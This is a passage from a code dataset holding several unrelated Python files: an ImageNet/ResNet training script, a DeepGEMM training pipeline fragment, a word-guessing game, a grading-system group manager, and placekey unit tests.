logger.info(\"Loaded GEMM model: %s\" % model_id)\n\n if n_y:\n y_columns = list(set(df.columns) - set(X_columns))\n y_columns = random.sample(y_columns, int(len(y_columns) * n_y))\n\n if objective:\n objectives = linear_reaction_coefficients(model_gemm)\n objective = list(iterkeys(objectives))[0]\n\n y_columns += [\"%s_flux\" % objective.id]\n else:\n y_columns = list(set(df.columns) - set(X_columns))\n \n logger.info(\"Using n(y) columns: %s\" % len(y_columns))\n\n X_train, X_test, y_train, y_test = train_df[X_columns], test_df[X_columns], \\\n train_df[y_columns], test_df[y_columns]\n\n logger.info(\"Starting training...\")\n\n with parallel.no_daemon_pool(processes = jobs) as pool:\n fn = build_fn(_train_model_step, X_train = X_train, X_test = X_test,\n Y_train = y_train, Y_test = y_test, *args, **kwargs)\n list(pool.map(fn, MODELS))\n\ndef train(data_dir = None, artifacts_path = None, *args, **kwargs):\n logger.info(\"Initiating Training...\")\n\n logger.info(\"Storing 
artifacts at path: %s\" % artifacts_path)\n\n jobs = kwargs.get(\"jobs\", settings.get(\"jobs\"))\n\n data_dir = get_data_dir(NAME, data_dir)\n\n data_csv = get_files(data_dir, \"*.csv\")\n \n if len(data_csv) == 0:\n logger.warn(\"No CSV file found in directory: %s\" % data_dir)\n else:\n logger.info(\"Found %s CSV files\" % len(data_csv))\n\n with parallel.no_daemon_pool(processes = jobs) as pool:\n fn = build_fn(_train_step, data_dir = data_dir, *args, **kwargs)\n list(pool.map(fn, data_csv))","repo_name":"HelikarLab/DeepGEMM","sub_path":"src/dgemm/pipelines/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6159,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"56"} +{"seq_id":"22904902179","text":"import argparse\nimport numpy as np\nimport os\nimport random\nimport shutil\nimport time\nimport warnings\nimport torch\nimport torch.backends.cudnn as cudnn\nimport torch.distributed as dist\nimport torch.multiprocessing as mp\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.optim\nimport torch.utils.data\nimport torch.utils.data.distributed\nimport torchvision.datasets as datasets\nimport torchvision.models as models\nimport torchvision.transforms as transforms\n\nfrom detectron2.checkpoint import DetectionCheckpointer\nfrom detectron2.config import get_cfg\nfrom detectron2.layers import ShapeSpec\nfrom detectron2.modeling.backbone import build_backbone\nfrom detectron2.modeling.roi_heads.box_head import build_box_head\n\nfrom wsl.config import add_wsl_config\n\n\nclass ResNet_WS(nn.Module):\n def __init__(self, cfg):\n super().__init__()\n\n self.backbone = build_backbone(cfg)\n self.maxpool = nn.MaxPool2d(2, stride=2, padding=0)\n self.neck = build_box_head(\n cfg,\n ShapeSpec(channels=self.backbone.output_shape()[\"res5\"].channels, height=7, width=7),\n )\n\n input_size = self.neck.output_size\n if not isinstance(input_size, int):\n input_size = np.prod(input_size)\n self.linear = nn.Linear(input_size, 1000)\n\n # Sec 5.1 in \"Accurate, Large Minibatch SGD: Training ImageNet in 1 Hour\":\n # \"The 1000-way fully-connected layer is initialized by\n # drawing weights from a zero-mean Gaussian with standard deviation of 0.01.\"\n nn.init.normal_(self.linear.weight, std=0.01)\n nn.init.constant_(self.linear.bias, 0.0)\n\n def forward(self, x):\n x = self.backbone(x)\n x = self.maxpool(x[\"res5\"])\n x = self.neck(x)\n x = self.linear(x.view(x.size(0), -1))\n return x\n\n\ndef set_resnet_ws_basic_cfg(arch, args, cfg):\n add_wsl_config(cfg)\n cfg.defrost()\n if arch == \"resnet101_ws\" or arch == \"resnet101_nas\":\n cfg.MODEL.BACKBONE.NAME = \"build_resnet_ws_backbone\"\n cfg.MODEL.RESNETS.DEPTH = 101\n cfg.MODEL.ROI_BOX_HEAD.DAN_DIM = [2048, 4096]\n elif arch == \"resnet50_ws\" or arch == \"resnet50_nas\":\n cfg.MODEL.BACKBONE.NAME = \"build_resnet_ws_backbone\"\n cfg.MODEL.ROI_BOX_HEAD.DAN_DIM = [2048, 4096]\n cfg.MODEL.RESNETS.DEPTH = 50\n elif arch == \"resnet18_ws\" or arch == \"resnet18_nas\":\n cfg.MODEL.BACKBONE.NAME = \"build_resnet_ws_backbone\"\n cfg.MODEL.RESNETS.DEPTH = 18\n cfg.MODEL.ROI_BOX_HEAD.DAN_DIM = [4096, 4096]\n cfg.MODEL.RESNETS.RES2_OUT_CHANNELS = 64\n cfg.MODEL.ROI_BOX_HEAD.NAME = \"DiscriminativeAdaptionNeck\"\n cfg.MODEL.ROI_BOX_HEAD.NUM_FC = 2\n cfg.MODEL.RESNETS.NORM = \"BN\"\n cfg.MODEL.RESNETS.OUT_FEATURES = [\"res5\"]\n cfg.MODEL.BACKBONE.FREEZE_AT = 0\n cfg.OUTPUT_DIR = args.output_dir\n cfg.freeze()\n return cfg\n\n\ndef get_resnet_ws(arch, args):\n cfg = get_cfg()\n cfg = 
set_resnet_ws_basic_cfg(arch, args, cfg)\n cfg.defrost()\n cfg.MODEL.ROI_BOX_HEAD.NAME = \"DiscriminativeAdaptionNeck\"\n cfg.MODEL.ROI_BOX_HEAD.NUM_FC = 2\n cfg.freeze()\n\n model = ResNet_WS(cfg)\n print(model)\n return model\n\n\ndef get_resnet_nas(arch, args):\n cfg = get_cfg()\n cfg = set_resnet_ws_basic_cfg(arch, args, cfg)\n cfg.defrost()\n cfg.MODEL.ROI_BOX_HEAD.NAME = \"NASNeck\"\n cfg.freeze()\n\n model = ResNet_WS(cfg)\n print(model)\n return model\n\n\ndef to_tensor(pic):\n \"\"\"Convert a ``PIL Image`` or ``numpy.ndarray`` to tensor.\n\n See ``ToTensor`` for more details.\n\n Args:\n pic (PIL Image or numpy.ndarray): Image to be converted to tensor.\n\n Returns:\n Tensor: Converted image.\n \"\"\"\n img = torch.ByteTensor(torch.ByteStorage.from_buffer(pic.tobytes()))\n nchannel = len(pic.mode)\n img = img.view(pic.size[1], pic.size[0], nchannel)\n # RGB to BGR\n img = img[:, :, [2, 1, 0]]\n # put it from HWC to CHW format\n # yikes, this transpose takes 80% of the loading time/CPU\n img = img.transpose(0, 1).transpose(0, 2).contiguous()\n return img.float()\n\n\nclass ToTensor(object):\n \"\"\"Convert a ``PIL Image`` or ``numpy.ndarray`` to tensor.\n\n Converts a PIL Image or numpy.ndarray (H x W x C) in the range [0, 255] of RGB forma to a torch.FloatTensor of shape (C x H x W) in the range [0.0, 255.0] of BGR format.\n \"\"\"\n\n def __call__(self, pic):\n \"\"\"\n Args:\n pic (PIL Image or numpy.ndarray): Image to be converted to tensor.\n\n Returns:\n Tensor: Converted image.\n \"\"\"\n return to_tensor(pic)\n\n def __repr__(self):\n return self.__class__.__name__ + \"()\"\n\n\nmodel_names = sorted(\n name\n for name in models.__dict__\n if name.islower() and not name.startswith(\"__\") and callable(models.__dict__[name])\n) + [\"resnet101_ws\", \"resnet50_ws\", \"resnet18_ws\", \"resnet101_nas\", \"resnet50_nas\", \"resnet18_nas\"]\n\nparser = argparse.ArgumentParser(description=\"PyTorch ImageNet Training\")\nparser.add_argument(\"data\", metavar=\"DIR\", help=\"path to dataset\")\nparser.add_argument(\n \"-a\",\n \"--arch\",\n metavar=\"ARCH\",\n default=\"resnet18\",\n choices=model_names,\n help=\"model architecture: \" + \" | \".join(model_names) + \" (default: resnet18)\",\n)\nparser.add_argument(\n \"-j\",\n \"--workers\",\n default=4,\n type=int,\n metavar=\"N\",\n help=\"number of data loading workers (default: 4)\",\n)\nparser.add_argument(\n \"--epochs\", default=90, type=int, metavar=\"N\", help=\"number of total epochs to run\"\n)\nparser.add_argument(\n \"--start-epoch\",\n default=0,\n type=int,\n metavar=\"N\",\n help=\"manual epoch number (useful on restarts)\",\n)\nparser.add_argument(\n \"-b\",\n \"--batch-size\",\n default=256,\n type=int,\n metavar=\"N\",\n help=\"mini-batch size (default: 256), this is the total \"\n \"batch size of all GPUs on the current node when \"\n \"using Data Parallel or Distributed Data Parallel\",\n)\nparser.add_argument(\n \"--lr\",\n \"--learning-rate\",\n default=0.1,\n type=float,\n metavar=\"LR\",\n help=\"initial learning rate\",\n dest=\"lr\",\n)\nparser.add_argument(\"--momentum\", default=0.9, type=float, metavar=\"M\", help=\"momentum\")\nparser.add_argument(\n \"--wd\",\n \"--weight-decay\",\n default=1e-4,\n type=float,\n metavar=\"W\",\n help=\"weight decay (default: 1e-4)\",\n dest=\"weight_decay\",\n)\nparser.add_argument(\n \"-p\", \"--print-freq\", default=10, type=int, metavar=\"N\", help=\"print frequency (default: 10)\"\n)\nparser.add_argument(\n \"--resume\",\n default=\"\",\n type=str,\n 
metavar=\"PATH\",\n help=\"path to latest checkpoint (default: none)\",\n)\nparser.add_argument(\n \"-e\",\n \"--evaluate\",\n dest=\"evaluate\",\n action=\"store_true\",\n help=\"evaluate model on validation set\",\n)\nparser.add_argument(\n \"--pretrained\", dest=\"pretrained\", action=\"store_true\", help=\"use pre-trained model\"\n)\nparser.add_argument(\n \"--world-size\", default=-1, type=int, help=\"number of nodes for distributed training\"\n)\nparser.add_argument(\"--rank\", default=-1, type=int, help=\"node rank for distributed training\")\nparser.add_argument(\n \"--dist-url\",\n default=\"tcp://224.66.41.62:23456\",\n type=str,\n help=\"url used to set up distributed training\",\n)\nparser.add_argument(\"--dist-backend\", default=\"nccl\", type=str, help=\"distributed backend\")\nparser.add_argument(\"--seed\", default=None, type=int, help=\"seed for initializing training. \")\nparser.add_argument(\"--gpu\", default=None, type=int, help=\"GPU id to use.\")\nparser.add_argument(\n \"--multiprocessing-distributed\",\n action=\"store_true\",\n help=\"Use multi-processing distributed training to launch \"\n \"N processes per node, which has N GPUs. This is the \"\n \"fastest way to use PyTorch for either single node or \"\n \"multi node data parallel training\",\n)\nparser.add_argument(\n \"--output_dir\",\n default=\"\",\n type=str,\n metavar=\"PATH\",\n help=\"path to save checkpoint (default: none)\",\n)\nparser.add_argument(\n \"--weights\", default=\"\", type=str, metavar=\"PATH\", help=\"path to load c1 pkl (default: none)\"\n)\n\nbest_acc1 = 0\n\n\ndef main():\n args = parser.parse_args()\n\n if args.seed is not None:\n random.seed(args.seed)\n torch.manual_seed(args.seed)\n cudnn.deterministic = True\n warnings.warn(\n \"You have chosen to seed training. \"\n \"This will turn on the CUDNN deterministic setting, \"\n \"which can slow down your training considerably! \"\n \"You may see unexpected behavior when restarting \"\n \"from checkpoints.\"\n )\n\n if args.gpu is not None:\n warnings.warn(\n \"You have chosen a specific GPU. 
This will completely \" \"disable data parallelism.\"\n )\n\n if args.dist_url == \"env://\" and args.world_size == -1:\n args.world_size = int(os.environ[\"WORLD_SIZE\"])\n\n args.distributed = args.world_size > 1 or args.multiprocessing_distributed\n\n ngpus_per_node = torch.cuda.device_count()\n if args.multiprocessing_distributed:\n # Since we have ngpus_per_node processes per node, the total world_size\n # needs to be adjusted accordingly\n args.world_size = ngpus_per_node * args.world_size\n # Use torch.multiprocessing.spawn to launch distributed processes: the\n # main_worker process function\n mp.spawn(main_worker, nprocs=ngpus_per_node, args=(ngpus_per_node, args))\n else:\n # Simply call main_worker function\n main_worker(args.gpu, ngpus_per_node, args)\n\n\ndef main_worker(gpu, ngpus_per_node, args):\n global best_acc1\n args.gpu = gpu\n\n if args.gpu is not None:\n print(\"Use GPU: {} for training\".format(args.gpu))\n\n if args.distributed:\n if args.dist_url == \"env://\" and args.rank == -1:\n args.rank = int(os.environ[\"RANK\"])\n if args.multiprocessing_distributed:\n # For multiprocessing distributed training, rank needs to be the\n # global rank among all the processes\n args.rank = args.rank * ngpus_per_node + gpu\n dist.init_process_group(\n backend=args.dist_backend,\n init_method=args.dist_url,\n world_size=args.world_size,\n rank=args.rank,\n )\n # create model\n if args.pretrained:\n print(\"=> using pre-trained model '{}'\".format(args.arch))\n model = models.__dict__[args.arch](pretrained=True)\n else:\n print(\"=> creating model '{}'\".format(args.arch))\n if \"_ws\" in args.arch:\n model = get_resnet_ws(args.arch, args)\n elif \"_nas\" in args.arch:\n model = get_resnet_nas(args.arch, args)\n else:\n model = models.__dict__[args.arch]()\n\n if args.weights:\n print(\"=> loading weights '{}'\".format(args.weights))\n DetectionCheckpointer(model, save_dir=args.output_dir).resume_or_load(\n args.weights, resume=True\n )\n\n if args.distributed:\n # For multiprocessing distributed, DistributedDataParallel constructor\n # should always set the single device scope, otherwise,\n # DistributedDataParallel will use all available devices.\n if args.gpu is not None:\n torch.cuda.set_device(args.gpu)\n model.cuda(args.gpu)\n # When using a single GPU per process and per\n # DistributedDataParallel, we need to divide the batch size\n # ourselves based on the total number of GPUs we have\n args.batch_size = int(args.batch_size / ngpus_per_node)\n args.workers = int((args.workers + ngpus_per_node - 1) / ngpus_per_node)\n model = torch.nn.parallel.DistributedDataParallel(model, device_ids=[args.gpu])\n else:\n model.cuda()\n # DistributedDataParallel will divide and allocate batch_size to all\n # available GPUs if device_ids are not set\n model = torch.nn.parallel.DistributedDataParallel(model)\n elif args.gpu is not None:\n torch.cuda.set_device(args.gpu)\n model = model.cuda(args.gpu)\n else:\n # DataParallel will divide and allocate batch_size to all available GPUs\n if args.arch.startswith(\"alexnet\") or args.arch.startswith(\"vgg\"):\n model.features = torch.nn.DataParallel(model.features)\n model.cuda()\n else:\n model = torch.nn.DataParallel(model).cuda()\n\n # define loss function (criterion) and optimizer\n criterion = nn.CrossEntropyLoss().cuda(args.gpu)\n\n optimizer = torch.optim.SGD(\n model.parameters(), args.lr, momentum=args.momentum, weight_decay=args.weight_decay\n )\n\n # optionally resume from a checkpoint\n if args.resume:\n if 
os.path.isfile(args.resume):\n print(\"=> loading checkpoint '{}'\".format(args.resume))\n if args.gpu is None:\n checkpoint = torch.load(args.resume)\n else:\n # Map model to be loaded to specified single gpu.\n loc = \"cuda:{}\".format(args.gpu)\n checkpoint = torch.load(args.resume, map_location=loc)\n args.start_epoch = checkpoint[\"epoch\"]\n best_acc1 = checkpoint[\"best_acc1\"]\n if args.gpu is not None:\n # best_acc1 may be from a checkpoint from a different GPU\n best_acc1 = best_acc1.to(args.gpu)\n model.load_state_dict(checkpoint[\"state_dict\"])\n optimizer.load_state_dict(checkpoint[\"optimizer\"])\n print(\"=> loaded checkpoint '{}' (epoch {})\".format(args.resume, checkpoint[\"epoch\"]))\n else:\n print(\"=> no checkpoint found at '{}'\".format(args.resume))\n\n cudnn.benchmark = True\n\n # Data loading code\n traindir = os.path.join(args.data, \"train\")\n valdir = os.path.join(args.data, \"val\")\n # normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n normalize = transforms.Normalize(mean=[102.9801, 115.9465, 122.7717], std=[1.0, 1.0, 1.0])\n\n train_dataset = datasets.ImageFolder(\n traindir,\n transforms.Compose(\n [\n transforms.RandomResizedCrop(224),\n transforms.RandomHorizontalFlip(),\n ToTensor(),\n normalize,\n ]\n ),\n )\n\n if args.distributed:\n train_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset)\n else:\n train_sampler = None\n\n train_loader = torch.utils.data.DataLoader(\n train_dataset,\n batch_size=args.batch_size,\n shuffle=(train_sampler is None),\n num_workers=args.workers,\n pin_memory=True,\n sampler=train_sampler,\n )\n\n val_loader = torch.utils.data.DataLoader(\n datasets.ImageFolder(\n valdir,\n transforms.Compose(\n [transforms.Resize(256), transforms.CenterCrop(224), ToTensor(), normalize]\n ),\n ),\n batch_size=args.batch_size,\n shuffle=False,\n num_workers=args.workers,\n pin_memory=True,\n )\n\n if args.evaluate:\n validate(val_loader, model, criterion, args)\n return\n\n for epoch in range(args.start_epoch, args.epochs):\n if args.distributed:\n train_sampler.set_epoch(epoch)\n adjust_learning_rate(optimizer, epoch, args)\n\n # train for one epoch\n train(train_loader, model, criterion, optimizer, epoch, args)\n\n # evaluate on validation set\n acc1 = validate(val_loader, model, criterion, args)\n\n # remember best acc@1 and save checkpoint\n is_best = acc1 > best_acc1\n best_acc1 = max(acc1, best_acc1)\n\n if not args.multiprocessing_distributed or (\n args.multiprocessing_distributed and args.rank % ngpus_per_node == 0\n ):\n\n filename = os.path.join(args.output_dir, str(epoch) + \"_iter.pth.tar\")\n save_checkpoint(\n {\n \"epoch\": epoch + 1,\n \"arch\": args.arch,\n \"state_dict\": model.state_dict(),\n \"best_acc1\": best_acc1,\n \"optimizer\": optimizer.state_dict(),\n },\n is_best,\n filename=filename,\n )\n\n\ndef train(train_loader, model, criterion, optimizer, epoch, args):\n batch_time = AverageMeter(\"Time\", \":6.3f\")\n data_time = AverageMeter(\"Data\", \":6.3f\")\n losses = AverageMeter(\"Loss\", \":.4e\")\n top1 = AverageMeter(\"Acc@1\", \":6.2f\")\n top5 = AverageMeter(\"Acc@5\", \":6.2f\")\n lr = AverageMeter(\"lr\", \":1.7f\")\n progress = ProgressMeter(\n len(train_loader),\n [batch_time, data_time, losses, top1, top5, lr],\n prefix=\"Epoch: [{}]\".format(epoch),\n )\n\n # switch to train mode\n model.train()\n\n end = time.time()\n for i, (images, target) in enumerate(train_loader):\n # measure data loading time\n data_time.update(time.time() - end)\n\n 
if args.gpu is not None:\n images = images.cuda(args.gpu, non_blocking=True)\n target = target.cuda(args.gpu, non_blocking=True)\n\n # compute output\n output = model(images)\n loss = criterion(output, target)\n\n # measure accuracy and record loss\n acc1, acc5 = accuracy(output, target, topk=(1, 5))\n losses.update(loss.item(), images.size(0))\n top1.update(acc1[0], images.size(0))\n top5.update(acc5[0], images.size(0))\n lr.update(optimizer.param_groups[0][\"lr\"], 1)\n\n # compute gradient and do SGD step\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n if i % args.print_freq == 0:\n progress.display(i)\n\n\ndef validate(val_loader, model, criterion, args):\n batch_time = AverageMeter(\"Time\", \":6.3f\")\n losses = AverageMeter(\"Loss\", \":.4e\")\n top1 = AverageMeter(\"Acc@1\", \":6.2f\")\n top5 = AverageMeter(\"Acc@5\", \":6.2f\")\n progress = ProgressMeter(len(val_loader), [batch_time, losses, top1, top5], prefix=\"Test: \")\n\n # switch to evaluate mode\n model.eval()\n\n with torch.no_grad():\n end = time.time()\n for i, (images, target) in enumerate(val_loader):\n if args.gpu is not None:\n images = images.cuda(args.gpu, non_blocking=True)\n target = target.cuda(args.gpu, non_blocking=True)\n\n # compute output\n output = model(images)\n loss = criterion(output, target)\n\n # measure accuracy and record loss\n acc1, acc5 = accuracy(output, target, topk=(1, 5))\n losses.update(loss.item(), images.size(0))\n top1.update(acc1[0], images.size(0))\n top5.update(acc5[0], images.size(0))\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n if i % args.print_freq == 0:\n progress.display(i)\n\n # TODO: this should also be done with the ProgressMeter\n print(\" * Acc@1 {top1.avg:.3f} Acc@5 {top5.avg:.3f}\".format(top1=top1, top5=top5))\n\n return top1.avg\n\n\ndef save_checkpoint(state, is_best, filename=\"checkpoint.pth.tar\"):\n torch.save(state, filename)\n if is_best:\n shutil.copyfile(filename, os.path.join(os.path.dirname(filename), \"model_best.pth.tar\"))\n\n\nclass AverageMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n\n def __init__(self, name, fmt=\":f\"):\n self.name = name\n self.fmt = fmt\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count\n\n def __str__(self):\n fmtstr = \"{name} {val\" + self.fmt + \"} ({avg\" + self.fmt + \"})\"\n return fmtstr.format(**self.__dict__)\n\n\nclass ProgressMeter(object):\n def __init__(self, num_batches, meters, prefix=\"\"):\n self.batch_fmtstr = self._get_batch_fmtstr(num_batches)\n self.meters = meters\n self.prefix = prefix\n\n def display(self, batch):\n entries = [self.prefix + self.batch_fmtstr.format(batch)]\n entries += [str(meter) for meter in self.meters]\n print(\"\\t\".join(entries))\n\n def _get_batch_fmtstr(self, num_batches):\n num_digits = len(str(num_batches // 1))\n fmt = \"{:\" + str(num_digits) + \"d}\"\n return \"[\" + fmt + \"/\" + fmt.format(num_batches) + \"]\"\n\n\ndef adjust_learning_rate(optimizer, epoch, args):\n \"\"\"Sets the learning rate to the initial LR decayed by 10 every 30 epochs\"\"\"\n lr = args.lr * (0.1 ** (epoch // 30))\n for param_group in optimizer.param_groups:\n param_group[\"lr\"] = lr\n\n\ndef accuracy(output, target, topk=(1,)):\n \"\"\"Computes the 
accuracy over the k top predictions for the specified values of k\"\"\"\n with torch.no_grad():\n maxk = max(topk)\n batch_size = target.size(0)\n\n _, pred = output.topk(maxk, 1, True, True)\n pred = pred.t()\n correct = pred.eq(target.view(1, -1).expand_as(pred))\n\n res = []\n for k in topk:\n correct_k = correct[:k].view(-1).float().sum(0, keepdim=True)\n res.append(correct_k.mul_(100.0 / batch_size))\n return res\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"shenyunhang/DRN-WSOD-pytorch","sub_path":"projects/WSL/tools/imagenet.py","file_name":"imagenet.py","file_ext":"py","file_size_in_byte":21405,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"56"} +{"seq_id":"27877356360","text":"import random\r\n\r\ndef save_words(words):\r\n with open(\"words.txt\", \"w\") as file:\r\n for word in words:\r\n file.write(word + \"\\n\")\r\n\r\ndef choose_random_word():\r\n with open(\"words.txt\", \"r\") as file:\r\n words = file.readlines()\r\n random_word = random.choice(words).strip()\r\n return random_word\r\n\r\n\r\ninput_words = input(\"word_list: \")\r\nwords_list = input_words.split(\",\")\r\n\r\n\r\nsave_words(words_list)\r\n\r\n\r\nrandom_word = choose_random_word()\r\nprint(\"random_word: \" + random_word)\r\n\r\n\r\n\r\ncorrect_guesses = []\r\nwrong_guesses = []\r\nchances = 5\r\n\r\nwhile chances > 0:\r\n letter = input(\"input your word: \")\r\n \r\n if letter in random_word:\r\n correct_guesses.append(letter)\r\n print(\"Words guesses correctly: \" + \", \".join(correct_guesses))\r\n else:\r\n wrong_guesses.append(letter)\r\n chances -= 1\r\n print(\"Wrong words guessed: \" + \", \".join(wrong_guesses))\r\n print(\"Number of chances left: \" + str(chances))\r\n \r\n if set(correct_guesses) == set(random_word):\r\n print(\"Congratulations, you got it right.\")\r\n print(\"The right word: \" + random_word)\r\n break\r\n\r\nif chances == 0:\r\n print(\"sorry, you are out of luck. 
the right word: \" + random_word)\r\n","repo_name":"rezaa79/Word-guessing-game","sub_path":"guess word.py","file_name":"guess word.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"8342745864","text":"from typing import Iterable, List\r\n\r\nfrom api.models.api_group import ApiGroup, ApiGroupStudents, ApiGroupStats, ApiNewGroup\r\nfrom api.models.managers.student_manager import StudentManager\r\nfrom db.controllers.group_controller import GroupController\r\nfrom db.models.groups import Group\r\n\r\n\r\nclass GroupManager:\r\n @staticmethod\r\n def get_api_group_from_group(group: Group) -> ApiGroup:\r\n return ApiGroup(id=group.group_id, name=group.name, students_count=len(group.students))\r\n\r\n @staticmethod\r\n def get_api_group_student_from_group(group: Group) -> ApiGroupStudents:\r\n api_group = ApiGroupStudents(\r\n **GroupManager.get_api_group_from_group(group).dict(),\r\n students=StudentManager.get_api_students_from_students(group.students.values())\r\n )\r\n return api_group\r\n\r\n @staticmethod\r\n def get_api_groups_students_from_groups(groups: Iterable[Group]) -> List[ApiGroup]:\r\n return [GroupManager.get_api_group_student_from_group(g) for g in groups]\r\n\r\n @staticmethod\r\n def get_api_group_stats_from_group(group: Group) -> ApiGroupStats:\r\n group_controller = GroupController(group)\r\n api_group_stats = ApiGroupStats(\r\n **GroupManager.get_api_group_from_group(group).dict(),\r\n grades_stats=group_controller.stats_by_subject,\r\n top_three_students=[\r\n StudentManager.get_api_student_avg_grade_from_student(student)\r\n for student in group_controller.top_three_students\r\n ]\r\n )\r\n return api_group_stats\r\n\r\n @staticmethod\r\n def get_group_from_group_new_api(group_new_api: ApiNewGroup) -> Group:\r\n return Group(name=group_new_api.name)\r\n","repo_name":"jafaul/grading_system","sub_path":"api/models/managers/group_manager.py","file_name":"group_manager.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31029231976","text":"\"\"\"\nPlacekey tests. 
These can be ran by calling `python3 -m unittest placekey.tests.test_placekey`\nin the parent directory of this repository.\n\n\"\"\"\n\nimport unittest\nimport h3.api.basic_int as h3_int\nfrom shapely.wkt import loads as wkt_loads\nfrom shapely.geometry import shape\nfrom shapely.ops import transform\nimport placekey.placekey as pk\n\n\nclass TestPlacekey(unittest.TestCase):\n \"\"\"\n Tests for placekey.py\n \"\"\"\n\n def setUp(self):\n def parse(line):\n tokens = line.split(',')\n return {\n \"lat\": float(tokens[0]),\n \"long\": float(tokens[1]),\n \"h3_r10\": tokens[2],\n \"h3_int_r10\": int(tokens[3]),\n \"placekey\": tokens[4],\n 'h3_lat': float(tokens[5]),\n 'h3_long': float(tokens[6]),\n 'info': tokens[7]\n }\n\n with open('placekey/tests/example_geos.csv', 'r') as f:\n next(f) # skip header\n self.sample = [parse(l.strip()) for l in f.readlines()]\n\n def parse_distances(line):\n tokens = line.split('\\t')\n return {\n 'placekey_1': tokens[0],\n 'geo_1': [float(x) for x in tokens[1][1:-1].split(',')],\n 'placekey_2': tokens[2],\n 'geo_2': [float(x) for x in tokens[3][1:-1].split(',')],\n 'distance': float(tokens[4]),\n }\n\n with open('placekey/tests/example_distances.tsv') as f:\n next(f) # skip header\n self.distance_samples = [parse_distances(l.strip())\n for l in f.readlines()]\n\n def test_geo_to_placekey(self):\n \"\"\"\n Test geo to Placekey conversion\n \"\"\"\n for row in self.sample:\n self.assertEqual(\n pk.geo_to_placekey(row['lat'], row['long']), row['placekey'],\n \"converted geo ({}, {}) did not match placekey ({})\".format(\n row['lat'], row['long'], row['placekey']))\n\n def test_placekey_to_geo(self):\n \"\"\"\n Test Placekey to geo conversion\n \"\"\"\n matching_places = 3\n for row in self.sample:\n lat, long = pk.placekey_to_geo(row['placekey'])\n self.assertAlmostEqual(\n lat, row['h3_lat'], matching_places,\n \"placekey's latitude ({}) too far from associated geo's latitude ({})\".format(\n lat, row['h3_lat']))\n self.assertAlmostEqual(\n long, row['h3_long'], matching_places,\n \"placekey's longitude ({}) too far from associated geo's longitude ({})\".format(\n long, row['h3_long']))\n\n def test_placekey_to_h3(self):\n \"\"\"\n Test Placekey to H3 conversion\n \"\"\"\n for row in self.sample:\n self.assertEqual(\n pk.placekey_to_h3(row['placekey']), row['h3_r10'],\n \"converted placekey ({}) did not match H3 at resolution 10 ({})\".format(\n pk.placekey_to_h3(row['placekey']), row['h3_r10']))\n\n def test_h3_to_placekey(self):\n \"\"\"\n Test H3 to Placekey conversion\n \"\"\"\n for row in self.sample:\n self.assertEqual(\n pk.h3_to_placekey(row['h3_r10']), row['placekey'],\n \"converted h3 ({}) did not match placekey ({})\".format(\n pk.h3_to_placekey(row['h3_r10']), row['placekey']))\n\n def test_string_cleaning(self):\n \"\"\"\n Test removal and reinsertion of bad words in strings\n \"\"\"\n for bw, replacement in pk.REPLACEMENT_MAP:\n self.assertEqual(\n pk._dirty_string(pk._clean_string(bw)), bw,\n \"dirty(clean()) not an identity mapping for {}\".format(bw))\n self.assertEqual(\n pk._clean_string(pk._dirty_string(replacement)), replacement,\n \"clean(dirty()) not an identity mapping for {}\".format(replacement))\n\n self.assertEqual(pk._clean_string('vjngr'), \"vjugu\",\n \"clean overlapping bad words out of sequence order\")\n self.assertEqual(pk._dirty_string('vjugu'), 'vjngr',\n \"dirty overlapping bad words out of sequence order\")\n\n self.assertEqual(pk._clean_string('prngr'), \"pregr\",\n \"clean overlapping bad words in sequence order\")\n 
self.assertEqual(pk._dirty_string('pregr'), 'prngr',\n \"dirty overlapping bad words in sequence order\")\n\n def test_get_neighboring_placekeys(self):\n \"\"\"\n Test generation of neighboring placekeys\n \"\"\"\n key = '@5vg-7gq-tvz'\n neighbors_dist1 = {\n '@5vg-7gq-7nq',\n '@5vg-7gq-7t9',\n '@5vg-7gq-gx5',\n '@5vg-7gq-tjv',\n '@5vg-7gq-tvz',\n '@5vg-7gq-ty9',\n '@5vg-7gq-v2k'}\n\n self.assertSetEqual(pk.get_neighboring_placekeys(key, 0), {key},\n \"placekey is its only neighbor of distance 0\")\n self.assertSetEqual(pk.get_neighboring_placekeys(key, 1), neighbors_dist1,\n \"placekey neighbors of distance 1 correct\")\n\n def test_placekey_to_hex_boundary(self):\n \"\"\"\n Test placekey to geo boundary conversion\n \"\"\"\n key = '@5vg-7gq-tvz'\n h3_integer = pk.placekey_to_h3_int(key)\n self.assertTupleEqual(\n pk.placekey_to_hex_boundary(key, geo_json=True),\n h3_int.h3_to_geo_boundary(h3_integer, geo_json=True),\n \"placekey boundary equal to H3 boundary (geo_json=True)\")\n self.assertTupleEqual(\n pk.placekey_to_hex_boundary(key, geo_json=False),\n h3_int.h3_to_geo_boundary(h3_integer, geo_json=False),\n \"placekey boundary equal to H3 boundary (geo_json=False)\")\n\n def test_placekey_to_wkt(self):\n \"\"\"\n Test Placekey to WKT conversion\n \"\"\"\n key = '@5vg-7gq-tvz'\n wkt = (\n 'POLYGON ((37.77804284141394 -122.4188730164743, '\n '37.77820687262237 -122.4197189541481, '\n '37.77887710717697 -122.4199258090291, '\n '37.77938331431949 -122.4192867193292, '\n '37.77921928451977 -122.4184407703954, '\n '37.77854904616886 -122.4182339224218, '\n '37.77804284141394 -122.4188730164743))'\n )\n pk_wkt = pk.placekey_to_wkt(key, geo_json=False)\n try:\n self.assertEqual(pk_wkt, wkt, 'correct WKT conversion')\n except AssertionError:\n # Depending on the system there may be small variations in the least\n # significant digits of the polygon 